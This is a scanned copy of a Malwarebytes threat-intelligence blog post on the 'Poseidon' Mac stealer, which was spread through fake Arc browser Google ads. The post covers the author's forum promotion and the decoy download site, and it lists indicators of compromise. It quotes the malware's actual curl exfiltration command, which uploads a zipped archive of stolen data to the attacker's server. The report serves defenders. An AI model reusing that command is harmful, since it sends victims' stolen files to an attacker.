www.malwarebytes.com
Open in
urlscan Pro
192.0.66.233
Public Scan
Submitted URL: https://clicks.malwarebytes.com/u/click?_t=24fabbbc5c2c43578ed8469e4f452569&_m=3335b5297af74493909964ae6274803b&_e=TiE3nphb8gP3w...
Effective URL: https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads?utm_source=iterable&utm_medium...
Submission: On July 16 via api from BE — Scanned from DE
Effective URL: https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads?utm_source=iterable&utm_medium...
Submission: On July 16 via api from BE — Scanned from DE
Form analysis 4 forms found in the DOM
GET https://www.malwarebytes.com/
<form role="search" method="get" class="search-form" action="https://www.malwarebytes.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Type to search..." value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>GET https://www.malwarebytes.com/
<form role="search" method="get" class="search-form" action="https://www.malwarebytes.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Type to search..." value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>GET https://www.malwarebytes.com/blog/
<form role="search" method="get" class="search-form" action="https://www.malwarebytes.com/blog/">
<div class="labs-sub-nav__searchbar-wrap">
<input class="labs-sub-nav__search-input" type="text" name="s" placeholder="Search Labs">
<button class="labs-sub-nav__search-button" id="cta-labs-rightrail-search-submit-en" aria-label="Search in Malwarebytes">
<svg xmlns="http://www.w3.org/2000/svg" width="35px" height="35px" viewBox="0 0 24 24" fill="none">
<g clip-path="url(#clip0_15_152)">
<rect width="24" height="24" fill="none"></rect>
<circle cx="10.5" cy="10.5" r="6.5" stroke="#0d3ecc" stroke-linejoin="round"></circle>
<path d="M19.6464 20.3536C19.8417 20.5488 20.1583 20.5488 20.3536 20.3536C20.5488 20.1583 20.5488 19.8417 20.3536 19.6464L19.6464 20.3536ZM20.3536 19.6464L15.3536 14.6464L14.6464 15.3536L19.6464 20.3536L20.3536 19.6464Z" fill="#0d3ecc">
</path>
</g>
<defs>
<clipPath id="clip0_15_152">
<rect width="24" height="24" fill="#0d3ecc"></rect>
</clipPath>
</defs>
</svg>
</button>
</div>
</form>https://www.malwarebytes.com/newsletter/
<form action="https://www.malwarebytes.com/newsletter/" class="newsletter-form">
<div class="newsletter-form__inline">
<label>Email Address</label>
<input type="email" name="email" id="cta-footer-newsletter-input-email-en" placeholder="Email Address" required="" class="newsletter-form__email">
<input type="hidden" class="newsletter-form__pageurl" value="https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads">
<input name="source" type="hidden" value="">
<input type="submit" value="Sign Up" class="newsletter-form__btn" id="cta-footer-newsletter-subscribe-email-en">
</div>
<div class="newsletter-form__validate hidden">
<span></span>
</div>
</form>Text Content
Skip to content
Search
Search Malwarebytes.com
Search for:
* Sign In
* MyAccount sign in: manage your personal or Teams subscription >
* Cloud Console sign in: manage your cloud business products >
* Partner Portal sign in: management for Resellers and MSPs >
* Personal
< Personal
Products
* Malwarebytes Premium Security >
* Malwarebytes Privacy VPN >
* Malwarebytes Identity Theft Protection >
* Malwarebytes Browser Guard >
* Malwarebytes for Teams/small offices >
* AdwCleaner for Windows >
--------------------------------------------------------------------------------
Find the right product
See our plans
Infected already?
Clean your device now
Solutions
* Free antivirus >
* Free virus scan & removal >
* Windows antivirus >
* Mac antivirus >
* Android antivirus >
* iOS security >
* Chromebook antivirus >
* Digital Footprint Scan >
See personal pricing
Manage your subscription
Visit our support page
* Business
< Business
BUNDLES
* ThreatDown Bundles
* Protect your endpoints with powerfully simple and cost-effective bundles
* Education Bundles
* Secure your students and institution against cyberattacks
TECHNOLOGY HIGHLIGHTS
* Managed Detection & Response (MDR)
* Deploy fully-managed threat monitoring, investigation, and remediation
* Endpoint Detection & Response (EDR)
* Prevent more attacks with security that catches what others miss
* Explore our portfolio >
Visualize and optimize your security posture in just minutes.
Learn more about Security Advisor (available in every bundle). >
* Pricing
< Pricing
Personal pricing
Protect your personal devices and data
Small office/home office pricing
Protect your team’s devices and data
Business pricing (5+ employees)
Step up your corporate endpoint security. Save up to 45%
* Partners
< Partners
Explore Partnerships
Partner Solutions
* Resellers
* Managed Service Providers
* Computer Repair
* Technology Partners
* Affiliate Partners
Contact Us
* Resources
< Resources
Learn About Cybersecurity
* Antivirus
* Malware
* Ransomware
Malwarebytes Labs – Blog
* Glossary
* Threat Center
Business Resources
* Reviews
* Analyst Reports
* Case Studies
Press & News
Reports
The State of Malware 2023 Report
Read report
* Support
< Support
Malwarebytes Personal Support
Malwarebytes and Teams Customers
ThreatDown Business Support
Nebula and Oneview Customers
Community Forums
Free Download
* Sign In
* < Sign In
* MyAccount sign in: manage your personal or Teams subscription >
* Cloud Console sign in: manage your cloud business products >
* Partner Portal sign in: management for Resellers and MSPs >
Search Search
Search Malwarebytes.com
Search for:
SUBSCRIBE rss
Cybercrime | Threat Intelligence
‘POSEIDON’ MAC STEALER DISTRIBUTED VIA GOOGLE ADS
Posted: June 27, 2024 by Jérôme Segura
On June 24, we observed a new campaign distributing a stealer targeting Mac
users via malicious Google ads for the Arc browser. This is the second time in
the past couple of months where we see Arc being used as a lure, certainly a
sign of its popularity. It was previously used to drop a Windows RAT, also via
Google ads.
The macOS stealer being dropped in this latest campaign is actively being
developed as an Atomic Stealer competitor, with a large part of its code base
being the same as its predecessor. Malwarebytes was previously tracking this
payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat
actor rebranded the new project ‘Poseidon’ and added a few new features such as
looting VPN configurations.
In this blog post, we review the advertisement of the new Poseidon campaign from
the cyber crime forum announcement, to the distribution of the new Mac malware
via malvertising.
RODRIGO4 LAUNCHES NEW PR CAMPAIGN
A threat actor known by his handle as Rodrigo4 in the XSS underground forum has
been working on a stealer with similar features and code base as the notorious
Atomic Stealer (AMOS). The service consists of a malware panel with statistics
and a builder with custom name, icon and AppleScript. The stealer offers
functionalities reminescent of Atomic Stealer including: file grabber, crypto
wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser
data collector.
In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for
their project:
Forum post by Rodrigo4 on XSS
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.
Malware authors do need publicity, but we will try to stick to the facts and
what we have observed in active malware delivery campaigns.
DISTRIBUTION VIA GOOGLE ADS
We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the
domain name arcthost[.]org:
Malicious ad for Arc browser via Google search
People who clicked on the ad were redirected to arc-download[.]com, a completely
fake site offering Arc for Mac only:
Decoy website for Arc
The downloaded DMG file resembles what one would expect when installing a new
Mac application with the exception of the right-click to open trick to bypass
security protections:
Malicious Arc DMG installer
CONNECTION TO NEW POSEIDON PROJECT
The new “Poseidon” stealer contains unfinished code that was seen by others, and
also recently advertised to steal VPN configurations from Fortinet and OpenVPN:
Excerpt from forum post featuring new VPN capability
More interesting is the data exfiltration which is revealed in the following
command:
set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")
Navigating to this IP address reveals the new Poseidon branded panel:
Poseidon panel login page
CONCLUSION
There is an active scene for Mac malware development focused on stealers. As we
can see in this post, there are many contributing factors to such a criminal
enterprise. The vendor needs to convince potential customers that their product
is feature-rich and has low detection from antivirus software.
Seeing campaigns distributing the new malware payload confirms that the threat
is real and actively targeting new victims. Staying protected against these
threats requires vigilance any time you download and install a new app.
Malwarebytes for Mac will keep detecting this ‘Poseidon campaign as
OSX.RodStealer and we have already shared information related to the malicious
ad with Google. We highly recommend using web protection that blocks ads and
malicious websites as your first line of defense. Malwarebytes Browser Guard
does both effectively.
INDICATORS OF COMPROMISE
Google ad domain
arcthost[.]org
Decoy site
arc-download[.]com
Download URL
zestyahhdog[.]com/Arc12645413[.]dmg
Payload SHA256
c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05
C2
79.137.192[.]4/p2p
SHARE THIS ARTICLE
RELATED ARTICLES
Podcast
HOW AN AI “ARTIST” STOLE A WOMAN’S FACE, WITH ALI DIAMOND (LOCK AND CODE S05E15)
July 15, 2024 - This week on the Lock and Code podcast, we speak with Ali
Diamond about what it felt like to find an AI image model of herself online.
CONTINUE READING 0 Comments
News
A WEEK IN SECURITY (JULY 8 – JULY 14)
July 15, 2024 - A list of topics we covered in the week of July 8 to July 14 of
2024
CONTINUE READING 0 Comments
Apple | Threat Intelligence
FAKE MICROSOFT TEAMS FOR MAC DELIVERS ATOMIC STEALER
July 12, 2024 - In a new malware campaign, threat actors are using Google ads to
target Mac users looking to download Microsoft Teams.
CONTINUE READING 0 Comments
News | Privacy
DANGEROUS MONITORING TOOL MSPY SUFFERS DATA BREACH, EXPOSES CUSTOMER DETAILS
July 12, 2024 - Customers of the stalkerware application mSpy had their customer
support details exposed after a data breach
CONTINUE READING 0 Comments
News | Privacy
“NEARLY ALL” AT&T CUSTOMERS HAD PHONE RECORDS STOLEN IN NEW DATA BREACH
DISCLOSURE
July 12, 2024 - AT&T has told customers about yet another data breach. This time
call and text records of nearly all customers were stolen.
CONTINUE READING 7 Comments
ABOUT THE AUTHOR
Jérôme Segura
Principal Threat Researcher
Contributors
Threat Center
Podcast
Glossary
Scams
Cyberprotection for every one.
FOR PERSONAL
* Windows Antivirus
* Mac Antivirus
* Android Antivirus
* Free Antivirus
* VPN App (All Devices)
* Malwarebytes for iOS
* SEE ALL
COMPANY
* About Us
* Contact Us
* Careers
* News and Press
* Blog
* Scholarship
* Forums
FOR BUSINESS
* Small Businesses
* Mid-size business
* Larger Enterprise
* Endpoint Protection
* Endpoint Detection & Response (EDR)
* Managed Detection & Response (MDR)
FOR PARTNERS
* Managed Service Provider (MSP) Program
* Resellers
MY ACCOUNT
Sign In
SOLUTIONS
* Digital Footprint Scan
* Rootkit Scanner
* Trojan Scanner
* Virus Scanner
* Spyware Scanner
* Password Generator
* Anti Ransomware Protection
ADDRESS
One Albert Quay
2nd Floor
Cork T12 X8N6
Ireland
3979 Freedom Circle
12th Floor
Santa Clara, CA 95054
LEARN
* Malware
* Hacking
* Phishing
* Ransomware
* Computer Virus
* Antivirus
* What is VPN?
* Twitter
* Facebook
* LinkedIn
* Youtube
* Instagram
CYBERSECURITY INFO YOU CAN’T LIVE WITHOUT
Want to stay informed on the latest news in cybersecurity? Sign up for our
newsletter and learn how to protect your computer from threats.
Email Address
English
* Legal
* Privacy
* Accessibility
* Compliance Certificates
* Vulnerability Disclosure
* Terms of Service
© 2024 All Rights Reserved
Select your language
* English
* Deutsch
* Español
* Français
* Italiano
* Português (Portugal)
* Português (Brasil)
* Nederlands
* Polski
* Pусский
* 日本語
* Svenska
This site uses cookies in order to enhance site navigation, analyze site usage
and marketing efforts. Please see our privacy policy for more information.
Privacy Policy
Cookies Settings Decline All Accept All Cookies
PRIVACY PREFERENCE CENTER
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
Privacy Policy
Allow All
MANAGE CONSENT PREFERENCES
STRICTLY NECESSARY
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to
block or alert you about these cookies, but some parts of the site will not then
work. These cookies do not store any personally identifiable information.
Cookies Details
PERFORMANCE AND FUNCTIONALITY
Performance and Functionality
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then
some or all of these services may not function properly.
Cookies Details
ANALYTICS
Analytics
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
Cookies Details
ADVERTISING
Advertising
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Cookies Details
Back Button
COOKIE LIST
Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
Decline All Confirm My Choices